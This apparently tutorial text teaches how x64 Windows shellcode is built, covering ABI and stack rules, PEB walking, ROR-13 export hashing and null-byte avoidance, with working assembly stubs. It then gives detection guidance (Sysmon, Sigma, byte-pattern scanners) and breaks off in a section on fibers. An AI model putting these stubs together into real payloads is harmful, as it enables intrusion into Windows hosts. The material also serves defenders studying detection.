2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

| Argument # | Integer Register | Floating-Point Register |
| --- | --- | --- |
| 1st | RCX | XMM0L |
| 2nd | RDX | XMM1L |
| 3rd | R8 | XMM2L |
| 4th | R9 | XMM3L |
| 5th+ | Stack (above shadow space) | Stack |

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

| Class | Registers |
| --- | --- |
| Volatile | RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5 |
| Non-volatile | RBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6–XMM15 |

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

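Note xor r9d, r9d rather than xor r9, r9: writing to the 32-bit sub-register zero-extends to the full 64-bit register. For R8–R15 both forms are the same length because a REX prefix is needed either way; the saving appears with the legacy registers, where xor ecx, ecx (31 C9) is one byte shorter than xor rcx, rcx (48 31 C9). Neither form contains a null byte.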


Diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX.
The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

  • Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
  • It is allocated by the caller, but the callee may overwrite it without saving the previous contents.
  • The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
  • Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).

| Layout immediately after call, before callee prologue | Offset from RSP |
| --- | --- |
| Return address (pushed by call) | [RSP + 0x00] |
| Shadow slot for RCX | [RSP + 0x08] |
| Shadow slot for RDX | [RSP + 0x10] |
| Shadow slot for R8 | [RSP + 0x18] |
| Shadow slot for R9 | [RSP + 0x20] |
| 5th argument (if any) | [RSP + 0x28] |

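Skip the shadow allocation and the first thing the callee does (often a mov [rsp+8], rcx early in a Win32 prologue) overwrites the 32 bytes above its return address. Without the reservation those bytes are your own live stack data: locals, stack strings, or the return address back to your own caller.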
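The layout rules reduce to simple arithmetic, sketched below as a lookup that reports where the callee finds each integer argument on entry (right after the call pushes the return address). The function names are illustrative; the offsets follow the table in this section.

```python
INT_REGS = ("RCX", "RDX", "R8", "R9")

def arg_location(index):
    """Location of integer argument `index` (1-based) as seen by the callee on entry."""
    if index < 1:
        raise ValueError("argument indices start at 1")
    if index <= 4:
        return INT_REGS[index - 1]
    # 8 bytes of return address + 32 bytes of shadow space precede the 5th argument.
    return f"[RSP+0x{0x28 + 8 * (index - 5):02X}]"

def home_slot(index):
    """Shadow-space slot reserved for register argument 1..4, relative to RSP on entry."""
    if not 1 <= index <= 4:
        raise ValueError("only the first four arguments have home slots")
    return f"[RSP+0x{8 * index:02X}]"

if __name__ == "__main__":
    for i in range(1, 7):
        print(i, arg_location(i))
    print([home_slot(i) for i in range(1, 5)])
```

From the caller's side, before the call instruction executes, the same slots sit 8 bytes lower: the fifth argument is written to [RSP+0x20].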


Stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention.
The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

  • 0x20 (32 bytes) for shadow space.
  • + 0x08 to undo the misalignment introduced by the call that entered the shellcode.

; Canonical shellcode call wrapper (assumes entry via call, so RSP ≡ 8 mod 16)
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x20                  ; shadow space only: RSP is already aligned, an extra 8 would misalign it

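To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, the reservation does not match the entry state: either the + 0x08 is missing after a call-style entry, or it was added on top of an explicit and rsp, -16.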
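The alignment rule is pure modular arithmetic, so it can be checked without a debugger. The sketch below models RSP as an integer and reports whether it is 16-byte aligned at the moment of the call for a given reservation size; the function names and the sample stack address are hypothetical.

```python
def rsp_at_call(entry_rsp, reserve, force_align=False):
    """RSP value at the call site after optional forced alignment and a sub rsp, reserve."""
    rsp = entry_rsp
    if force_align:
        rsp &= ~0xF          # same effect as: and rsp, -16
    return rsp - reserve

def is_call_aligned(rsp):
    """The Microsoft x64 ABI expects RSP % 16 == 0 when a call executes."""
    return rsp % 16 == 0

if __name__ == "__main__":
    entered_by_call = 0x1000 - 8     # caller was aligned, call pushed 8 bytes
    cases = [
        ("call entry, sub 0x28", rsp_at_call(entered_by_call, 0x28)),
        ("call entry, sub 0x20", rsp_at_call(entered_by_call, 0x20)),
        ("forced align, sub 0x20", rsp_at_call(entered_by_call, 0x20, force_align=True)),
        ("forced align, sub 0x28", rsp_at_call(entered_by_call, 0x28, force_align=True)),
    ]
    for label, rsp in cases:
        print(f"{label}: rsp={rsp:#x} aligned={is_call_aligned(rsp)}")
```

The two aligned combinations are the ones to remember: 0x28 after a call-style entry, and 0x20 (or any multiple of 16) after an explicit and rsp, -16.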


5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

  • RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
  • call/pop delta trick. A call to the next instruction pushes its return address, which is the runtime location of the following label. The code at that label pops it into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = runtime address of get_rip (the pushed return address)
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

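In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes). Note that a call to the very next instruction encodes as E8 00 00 00 00, so null-free variants jump forward to a call that targets a label behind it, which yields a negative displacement.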


6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

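| Step | Source | Field | Offset (x64) |
| --- | --- | --- | --- |
| 1 | GS segment | TEB | n/a |
| 2 | TEB | ProcessEnvironmentBlock | +0x060 |
| 3 | PEB | Ldr → PEB_LDR_DATA | +0x018 |
| 4 | PEB_LDR_DATA | InMemoryOrderModuleList | +0x020 |
| 5 | LDR_DATA_TABLE_ENTRY link | InMemoryOrderLinks.Flink | +0x000 |
| 6 | LDR_DATA_TABLE_ENTRY | DllBase (from InMemoryOrderLinks) | +0x020 (+0x030 from the start of the entry) |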

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x20]     ; DllBase: entry +0x30, minus 0x10 because rbx points at InMemoryOrderLinks
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt ntdll!_TEB ProcessEnvironmentBlock
0:000> dt ntdll!_PEB Ldr
0:000> dt ntdll!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt ntdll!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32

Flow diagram tracing the PEB walk from GS register through PEB_LDR_DATA and InMemoryOrderModuleList to locate kernel32.dll base address.
Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll’s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

| Field | Offset |
| --- | --- |
| e_lfanew (RVA of PE header) | DllBase + 0x3C |
| Optional Header | PE_header + 0x18 |
| Export Directory RVA (PE32+) | OptHeader + 0x70 |
| AddressOfFunctions | ExportDir + 0x1C |
| AddressOfNames | ExportDir + 0x20 |
| AddressOfNameOrdinals | ExportDir + 0x24 |

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx ecx, byte [rsi]        ; rcx is free after the header parse; rax must keep the module base
    test  cl, cl
    jz    .check
    ror   edi, 13
    add   edi, ecx
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard, which is precisely why defenders now key on it (see §10).
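From the defender's side, that ubiquity makes the resolver easy to hunt. The sketch below scans a byte blob for two encodings of a 13-bit rotate (C1 CF 0D for ror edi, 13 and 41 C1 C9 0D for ror r9d, 13) and for little-endian copies of a few well-known function-name hashes. The pattern set and function names are illustrative and far from exhaustive; a production rule would normally live in YARA.

```python
import struct

ROR13_OPCODES = {
    b"\xC1\xCF\x0D": "ror edi, 13",
    b"\x41\xC1\xC9\x0D": "ror r9d, 13",
}

# Function-name-only ROR-13 values; module-qualified schemes produce different constants.
KNOWN_HASHES = {
    0xEC0E4E8E: "LoadLibraryA",
    0x7C0DFCAA: "GetProcAddress",
    0x91AFCA54: "VirtualAlloc",
    0x73E2D87E: "ExitProcess",
}

def find_all(blob, needle):
    """Return every offset at which needle occurs in blob."""
    hits, pos = [], blob.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = blob.find(needle, pos + 1)
    return hits

def scan(blob):
    """Return sorted (offset, description) pairs for resolver indicators in blob."""
    findings = []
    for pattern, label in ROR13_OPCODES.items():
        findings += [(off, label) for off in find_all(blob, pattern)]
    for value, name in KNOWN_HASHES.items():
        needle = struct.pack("<I", value)
        findings += [(off, f"hash constant for {name}") for off in find_all(blob, needle)]
    return sorted(findings)

if __name__ == "__main__":
    sample = b"\x90" * 4 + b"\xC1\xCF\x0D" + b"\x90" + struct.pack("<I", 0x7C0DFCAA)
    for offset, description in scan(sample):
        print(f"{offset:#06x}  {description}")
```

Short byte patterns like these will produce false positives in large binaries, so treat a hit as a lead that needs the surrounding disassembly, not as a verdict.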


8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem | Fix
mov rax, 0x000000007FFE1234 → nulls | xor eax, eax then mov eax, 0x7FFE1234 (zero-extends)
64-bit literal in mov r9, imm64 | lea r9, [rel label] or build via shifts/ORs
push 0 → encodes 6A 00 | xor rcx, rcx ; push rcx
mov rcx, 0 → 7-byte encoding with four null bytes | xor ecx, ecx

; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
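BAD_CHARS = {0x00}  # extend for the delivery path, e.g. add 0x0A and 0x0D for line-oriented input
bad = [i for i, b in enumerate(buf) if b in BAD_CHARS]
print(f"length={len(buf)} bad_byte_offsets={bad}")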

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.
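
When Keystone is not installed, the same comparison can be made on hand-built encodings. The following is a small sketch, assuming the two encodings quoted in the null-byte comparison (48 B8 + imm64 and B8 + imm32); the helper names are hypothetical.

```python
import struct


def find_bad_bytes(code: bytes, bad=frozenset({0x00})) -> list:
    """Return the offsets of every byte in `code` that is in the `bad` set."""
    return [i for i, b in enumerate(code) if b in bad]


def mov_rax_imm64(value: int) -> bytes:
    """Encode mov rax, imm64 (REX.W + B8 followed by 8 little-endian bytes)."""
    return b"\x48\xB8" + struct.pack("<Q", value)


def mov_eax_imm32(value: int) -> bytes:
    """Encode mov eax, imm32 (B8 followed by 4 little-endian bytes)."""
    return b"\xB8" + struct.pack("<I", value)


if __name__ == "__main__":
    for label, code in (("imm64", mov_rax_imm64(0x76AB1234)),
                        ("imm32", mov_eax_imm32(0x76AB1234))):
        print(label, code.hex(), find_bad_bytes(code))
```

Passing a larger `bad` set models delivery paths that also reject other bytes, such as line feeds in a line-oriented protocol.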


9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: save caller RSP, then align ---
    push  rbp
    mov   rbp, rsp
    and   rsp, 0xFFFFFFFFFFFFFFF0  ; force 16-byte alignment
    sub   rsp, 0x20                ; 32-byte shadow space; RSP stays 16-byte aligned at each call

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink (first entry: the EXE)
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x20]        ; r15 = kernel32 base. rbx points at InMemoryOrderLinks
                                   ; (entry + 0x10), so DllBase (entry + 0x30) is rbx + 0x20

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    mov   rsp, rbp                 ; restore caller RSP
    pop   rbp
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret

Every block in the skeleton corresponds to one of the rules established above: an aligned RSP with 32 bytes of shadow space before each call (the and/sub pair here; sub rsp, 0x28 is the equivalent idiom at a normal function entry, where RSP sits 8 bytes off alignment), gs:[0x60] for the PEB, DllBase at entry + 0x30 (rbx + 0x20 when the walk follows InMemoryOrderLinks), lea + RIP-relative strings for PIC, and r14 / r15 carrying state across calls because callees preserve non-volatile registers. A stub that returns to its caller must itself save and restore rbx, r14, and r15.


10. Common Attacker Techniques

Technique | Description
PEB-walk API resolution | Locate kernel32.dll via gs:[0x60] chain, parse exports by hash
ROR-13 export hashing | Avoid embedded API name strings; survive static signature scans
RIP-relative PIC | lea reg, [rel label] to address embedded data without fixups
Sub-register zero-extension | mov eax, imm32 to write RAX with no null bytes
Shadow-space-aware call wrapping | sub rsp, 0x28 around every Win32 call from an unknown caller
Direct Win32 → Native API substitution | Call Nt* syscalls to bypass usermode hooks (T1106)
Reflective loading of a PE in memory | Shellcode bootstraps a full PE image without touching disk (T1620)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

  • EventID 1: Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
  • EventID 8: CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
  • EventID 10: ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (PROCESS_ALL_ACCESS, which includes VM-write) and 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ, a read-only mask typical of memory scraping).
  • EventID 17 / 18: Pipe creation/connection, frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

  • Microsoft-Windows-Kernel-Process: kernel-side process/thread/image events.
  • Microsoft-Windows-Threat-Intelligence (PPL-only): NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx observed at the syscall layer, so patching user-mode hooks does not suppress it.
  • Microsoft-Windows-Security-Auditing: handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface comparable events (4688 for process creation; 4656/4663 for handle requests and object access) in the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

  • Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
  • CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
  • gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
  • ROR-13 hashing loops in memory scans.
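
The last two byte-pattern hunts can be prototyped over a dumped region before being turned into YARA. This is a rough sketch, assuming the region is already available as bytes. The signature names and the `scan` helper are hypothetical, and both patterns also occur in legitimate code (ntdll and kernel32 read gs:[0x60] too), so hits only matter inside unbacked or otherwise unexpected regions.

```python
import re

SIGNATURES = {
    # mov r64, gs:[0x60] -> 65, REX.W (48 or 4C), 8B, ModRM (mod=00, rm=100),
    # SIB 25, disp32 0x00000060. The ModRM class covers all eight reg fields.
    "peb_read_gs60": re.compile(
        rb"\x65[\x48\x4c]\x8b[\x04\x0c\x14\x1c\x24\x2c\x34\x3c]\x25\x60\x00\x00\x00"
    ),
    # ror r32, 13 -> optional REX.B (41), C1 /1 ib with ib = 0x0D.
    "ror13": re.compile(rb"\x41?\xc1[\xc8-\xcf]\x0d"),
}


def scan(region: bytes) -> dict:
    """Return {signature name: [match offsets]} for one memory region."""
    return {name: [m.start() for m in rx.finditer(region)]
            for name, rx in SIGNATURES.items()}
```

A region that contains both a PEB read and a ROR-13 rotate within a few hundred bytes of each other is a stronger signal than either pattern alone.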

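Sigma sketch: suspicious cross-process access typical of injection (full access) and memory scraping (query + VM-read):

title: Suspicious Cross-Process Access With Full-Access or VM-Read Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'   # PROCESS_ALL_ACCESS (includes VM_WRITE and CREATE_THREAD)
      - '0x1410'     # QUERY_INFORMATION + QUERY_LIMITED_INFORMATION + VM_READ
      - '0x1010'     # QUERY_LIMITED_INFORMATION + VM_READ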
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high
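
When triaging hits from a rule like this, it helps to decode each GrantedAccess mask into named rights rather than memorising hex values. The sketch below uses a subset of the documented process access rights; the helper names are hypothetical, and the table is deliberately incomplete.

```python
# Subset of the documented process access rights (winnt.h values).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def _as_int(mask) -> int:
    """Accept either an int or a Sysmon-style hex string such as '0x1010'."""
    return int(mask, 16) if isinstance(mask, str) else mask


def decode_granted_access(mask) -> list:
    """Return the names of the known rights set in the mask, lowest bit first."""
    value = _as_int(mask)
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]


def can_write_memory(mask) -> bool:
    """True when the mask carries both VM_OPERATION and VM_WRITE."""
    needed = 0x0008 | 0x0020
    return (_as_int(mask) & needed) == needed
```

Decoded this way, 0x1010 and 0x1410 turn out to be read-oriented masks, while 0x1FFFFF is the only one of the three that permits writing into the target.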

Hardening to deploy on monitored endpoints:

  • Arbitrary Code Guard (ACG): denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
  • Control Flow Guard (CFG): makes CFG-instrumented code reject indirect calls to targets not marked valid. Dynamically allocated executable memory is marked valid by default (unless allocated with PAGE_TARGETS_INVALID), so CFG constrains hijacked call sites more than the shellcode itself.
  • Block Win32 API calls from Office macros, and block Office applications from creating child processes: Attack Surface Reduction rules that sever the most common shellcode delivery vectors.
  • PPL-protected EDR with kernel ETW Ti subscription: preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.


12. Tools for x64 Shellcode Analysis

Tool | Description | Link
NASM | Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection | nasm.us
Keystone Engine | Programmatic assembler (Python bindings) for bad-character analysis labs | keystone-engine.org
x64dbg | User-mode debugger; trace shellcode through gs:[0x60] and EAT walks | x64dbg.com
WinDbg | Inspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target build | learn.microsoft.com
Ghidra / IDA | Static analysis of shellcode-bearing samples and reflective loader stubs | ghidra-sre.org
Volatility 3 | Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threads | volatilityfoundation.org
Process Hacker | Live triage of thread start addresses and memory protections | processhacker.sourceforge.io
Godbolt Compiler Explorer | Inspect MSVC-emitted x64 prologues to confirm ABI assumptions | godbolt.org

13. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Process Injection (umbrella) | T1055 | Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess
DLL Injection | T1055.001 | Image Load (EventID 7) of an unsigned or unexpectedly located DLL, preceded by EventID 8/10 against the same target
Portable Executable Injection | T1055.002 | Volatility scans for PE headers in MEM_PRIVATE RX regions
APC Injection | T1055.004 | ETW Ti NtQueueApcThread to a remote thread; APC routine address in unbacked memory
Process Hollowing | T1055.012 | EventID 1 with suspended child, followed by EventID 10 write + resume
Native API | T1106 | ETW Ti syscall provider; direct Nt* calls outside ntdll
Obfuscated Files or Information | T1027 | YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code Loading | T1620 | Unbacked RX memory with PE magic / no module image record

Summary

  • x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
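  • The PEB is reached via gs:[0x60] on x64 (the TEB's ProcessEnvironmentBlock field); every offset in the walk (PEB + 0x18 for Ldr, Ldr + 0x20 for InMemoryOrderModuleList, entry + 0x30 for DllBase) differs from the x86 layout and must be verified against the target build.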
  • Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
  • Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
  • Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

Fibers: User-Mode Cooperative Threads

Objective: Understand the internals of Windows fibers — how they relate to the TEB, the undocumented FIBER structure, Fiber Local Storage, and the cooperative context switch performed entirely in user mode — so defenders can recognize and detect adversarial use of fiber APIs for stealthy in-process execution.


1. Cooperative vs. Preemptive Scheduling

A thread is the Windows kernel’s unit of execution. The scheduler picks ready threads, slices CPU time, and preempts them at quantum boundaries — all driven from ntoskrnl.exe. A fiber is different: it is a unit of execution that the kernel does not know about. Fibers run inside threads, and the application — not the OS — chooses when one fiber yields and another runs.

Two consequences follow immediately:

  • A fiber switch never crosses the user/kernel boundary. No syscall is issued. SwitchToFiber lives in KernelBase.dll and returns without touching ntoskrnl.
  • From the kernel’s perspective, all activity performed by a fiber is attributed to the thread that runs it. Accessing TLS from a fiber accesses the thread’s TLS, not a per-fiber slot.

This is the root of both the elegance and the security relevance of fibers: they are coroutines built directly into the Win32 ABI, with stack pivots and register saves the kernel cannot see.
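
The cooperative model is easy to see in miniature outside Windows. The sketch below is an analogy only: it uses Python generators, not the Win32 fiber API, and the names `worker` and `run_round_robin` are hypothetical. Each `yield` plays the role of a fiber switching back to the dispatcher, and nothing preempts a worker between yields.

```python
def worker(name, steps):
    """A cooperative task: runs until it chooses to yield control."""
    for i in range(steps):
        yield f"{name}:{i}"  # explicit yield, analogous to switching back to the main fiber


def run_round_robin(workers):
    """Resume each worker in turn until all have finished; return the trace."""
    trace = []
    ready = list(workers)
    while ready:
        for w in list(ready):
            try:
                trace.append(next(w))  # resume the worker until its next yield
            except StopIteration:
                ready.remove(w)        # worker finished; drop it from the rotation
    return trace


if __name__ == "__main__":
    print(run_round_robin([worker("a", 2), worker("b", 1)]))
```

As with fibers, a worker that never yields starves every other worker, because no scheduler exists to take the CPU away from it.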


2. The Fiber Execution Model

A fiber consists of three things: a stack, a saved CPU context (registers, instruction pointer, SEH frame), and a start routine that receives an opaque parameter. A thread becomes “fiber-aware” by calling ConvertThreadToFiber, and it remains a fiber host until it calls ConvertFiberToThread.

Rule | Behavior
Must convert first | You cannot call SwitchToFiber from a thread until ConvertThreadToFiber runs.
Fiber function returning | If a fiber’s start routine returns, the host thread calls ExitThread and terminates.
Self-delete | If the currently running fiber calls DeleteFiber on itself, the host thread exits.
Cross-thread delete | Deleting a fiber that is the selected fiber of another thread will likely crash that thread, because its stack just disappeared.
Cross-thread switch | SwitchToFiber accepts a fiber created by a different thread; the caller becomes the new host.

These rules are load-bearing — most fiber bugs (and several known abuse primitives) come from violating them.


3. TEB Layout and the FIBER Structure

The Thread Environment Block (TEB) tracks the per-thread fiber state. Three fields matter:

Field | Type | Role
NtTib.FiberData | PVOID | Pointer to the current fiber’s FIBER structure
HasFiberData | USHORT : 1 | Bitfield set by ConvertThreadToFiberEx; indicates the thread hosts fibers
FlsData | PVOID | Pointer to the FLS slot array for the current fiber

ConvertThreadToFiberEx calls NtCurrentTeb(), checks Teb->HasFiberData, and if the thread is already a fiber returns with ERROR_ALREADY_FIBER. Otherwise it allocates a FIBER structure on the process heap via RtlAllocateHeap and stores its address in NtTib.FiberData.

The FIBER struct itself is not officially documented. The shape below is reconstructed from ReactOS sources and public symbols and is subject to change across Windows versions:

// Reconstructed from public symbols / ReactOS — illustrative only.
typedef struct _FIBER {
